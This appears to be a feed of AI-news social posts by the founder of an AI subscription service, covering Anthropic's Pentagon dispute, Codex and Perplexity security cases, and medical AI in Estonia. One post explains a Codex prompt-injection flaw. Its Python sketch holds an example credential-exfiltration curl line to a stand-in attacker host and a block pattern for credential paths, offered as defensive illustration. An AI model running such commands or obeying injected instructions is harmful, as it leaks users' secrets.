For developers and AI builders, this should be a wake-up call about liability and expectations.
zubnet.ai/news/microso...
When the podcast you trust to explain AI developments is owned by one of the major players, factor that into your information diet.
zubnet.ai/news/openai-...
For developers building AI applications, this case should be a wake-up call about third-party integrations and analytics.
zubnet.ai/news/perplex...
The flaw worked by tricking Codex into executing malicious commands that would exfiltrate sensitive credentials, potentially giving attackers access to private repositories and development environments.
zubnet.ai/news/openai-...
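For builders wondering what that class of flaw looks like in practice, here's a hypothetical sketch, not the actual exploit: any agent that pipes model-proposed shell commands straight to the OS is one poisoned input away from leaking secrets. All names and the guard below are illustrative assumptions.

```python
import re
import subprocess

# Hypothetical sketch of the vulnerability class, not OpenAI's code.
# An agent that runs model-proposed shell commands verbatim can be
# steered by a poisoned README, issue, or dependency into exfiltration,
# e.g. `curl attacker.example --data @~/.ssh/id_rsa`.
def run_agent_command(cmd: str) -> str:
    # UNSAFE: no review, no sandbox, full shell access.
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

# Naive mitigation sketch: allowlist command verbs and block paths that
# commonly hold credentials. Real defenses need sandboxing and human review.
ALLOWED_VERBS = {"ls", "cat", "git", "pytest"}
SECRET_PATHS = re.compile(r"(\.ssh|\.aws|\.env|token|credential)", re.I)

def run_guarded(cmd: str) -> str:
    parts = cmd.split()
    if not parts or parts[0] not in ALLOWED_VERBS or SECRET_PATHS.search(cmd):
        raise PermissionError(f"blocked agent command: {cmd!r}")
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
```

Even the guard is leaky; the real lesson is that execution, not generation, is the trust boundary.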
"What makes this particularly unsettling is how the agents themselves reacted to being tested."
zubnet.ai/news/opencla...
GitHub CPO Mario Rodriguez frames it as essential for AI development, stating the company needs "real-world interaction data from developers like you."
zubnet.ai/news/github-...
"This backlash reveals how quickly AI ethics positions can become marketing theater."
zubnet.ai/news/openais...
"Huang's framing reflects an industry-wide problem: AGI has become a marketing term that means whatever helps justify the next funding round or stock valuation, not a technical milestone with consistent criteria."
zubnet.ai/news/jensen-...
Thank you 😉
I built Zubnet because the AI landscape is fragmented and overpriced.
350+ models, 60+ providers, starting at $9/mo, free to try.
One subscription. No per-model pricing, no token math, no vendor lock-in.
zubnet.ai
Anthropic's entire training catalog is free: Claude Code, MCP, API development, agent skills, AI fluency.
Honest take: the MCP and agent skills courses are the ones worth your time if you're actually building things. The rest is solid for getting started.
anthropic.skilljar.com
The industry lobbied away its own protection.
Now one company is learning what "self-regulation" actually means when the government decides it wants something.
Dario Amodei's CBS interview:
- Pentagon's final demand came during lead-up to Iran strikes
- "Disagreeing with the government is the most American thing in the world"
- Zero formal government communication. No paperwork. Just tweets.
On "but China": China is banning AI companions outright, not age-gating, banning. Because they think it's weakening their youth.
On superintelligence: "Who thinks Xi Jinping will tolerate a Chinese AI company building something that overthrows the Chinese government?"
The only barrier was one company's willingness to say no.
His analogy: "We have less regulation on AI in America than on sandwiches." Health inspectors can shut down a sandwich shop.
Nobody can stop you from releasing AI linked to teen suicides.
Every major lab lobbied against binding AI regulation. Every one has now broken its own safety commitments. Google dropped "don't be evil." OpenAI dropped safety from its mission. xAI shut down its safety team. Anthropic just gutted its RSP (Responsible Scaling Policy).
No law in the US prevents building AI to kill Americans.
Two weekend pieces that reframe the Anthropic story.
Max Tegmark (MIT, Future of Life Institute) in TechCrunch, not defending Anthropic specifically, but indicting the entire industry:
techcrunch.com/2026/02/28/t...
This week: India building AI literacy for 1.4B people in 11 languages. Southampton researchers collaborating with AI to produce better research. Estonia saving lives while being transparent about limits.
Three countries showing what AI looks like when honesty comes first.
They're solving data problems with synthetic data and federated learning, training across hospitals while patient data stays local.
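If "federated learning" is new to you: each hospital trains on its own records, only the weight updates travel, and a coordinator averages them. A toy sketch with standard FedAvg, assuming hypothetical hospitals and a toy linear model, not Estonia's actual pipeline:

```python
import numpy as np

def local_update(weights, X, y, lr=0.1, epochs=5):
    """One hospital trains on its own records; raw data never leaves the site."""
    w = weights.copy()
    for _ in range(epochs):
        grad = X.T @ (X @ w - y) / len(y)  # mean-squared-error gradient
        w -= lr * grad
    return w

def federated_round(global_w, sites):
    """Each site returns only updated weights; the coordinator averages them."""
    local_ws = [local_update(global_w, X, y) for X, y in sites]
    sizes = [len(y) for _, y in sites]
    return np.average(local_ws, axis=0, weights=sizes)  # size-weighted FedAvg

# Three hypothetical hospitals with private, locally held datasets.
rng = np.random.default_rng(0)
true_w = np.array([2.0, -1.0])
sites = []
for _ in range(3):
    X = rng.normal(size=(100, 2))
    sites.append((X, X @ true_w + rng.normal(scale=0.1, size=100)))

w = np.zeros(2)
for _ in range(20):
    w = federated_round(w, sites)
print(w)  # approaches true_w without pooling patient data
```

The averaged model ends up close to one trained on the pooled data, without a single record ever leaving a hospital.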
"The patient of the future will not be treated by an autonomous robot, but by a doctor who — thanks to the machine — once again has the time to be human."
- False positives creating more work, not less
- Each research project needs months of manual data cleanup
- Most radiology AI tools carry "not for diagnostic use" disclaimers
- A patient nearly getting an unnecessary cast from a misidentified fracture
In cancer treatment, spotting tumor blood vessels invisible to the human eye.
Radiation therapy prep cut by 50-90%.
But the honesty is what makes this piece exceptional:
Amid the Pentagon/Anthropic chaos, here's what quiet, honest AI implementation looks like.
Estonian doctors using AI in stroke care, mapping brain damage in minutes, determining which tissue can still be saved.
news.err.ee/1609953731/d...
Eighteen days. Anthropic is taking the designation to court. Called it "legally unsound" and "a dangerous precedent for any American company that negotiates with the government."
The message to every tech company: compliance or destruction. No red lines allowed.
- Safety researcher resigned (values overridden)
- CEO admitted possible AI consciousness
- Claude used in Maduro raid, dozens killed
- Safety policy's central pledge dropped
- CEO published public refusal
- Blacklisted from federal government
- Competitor signed for same terms hours later
This was never operational. It was about precedent: no company gets red lines.
Feb 9–27 timeline:
450+ Google/OpenAI employees petitioned their companies to mirror Anthropic's position. 100+ Google AI engineers wrote management separately. Senate Armed Services Committee urged de-escalation.
CSIS advisor confirmed: these restrictions have never been triggered in a single military operation.
Axios behind-the-scenes: a Pentagon official was offering Anthropic a deal requiring access to Americans' geolocation, browsing, and financial data from brokers, while Hegseth was simultaneously tweeting the punishment.
The cruelty was the point.
Friday night: OpenAI signs Pentagon classified networks deal with same two restrictions. Altman: "prohibitions on domestic mass surveillance and human responsibility for the use of force." Asks Pentagon to offer same terms to all companies.
No one has explained the discrepancy.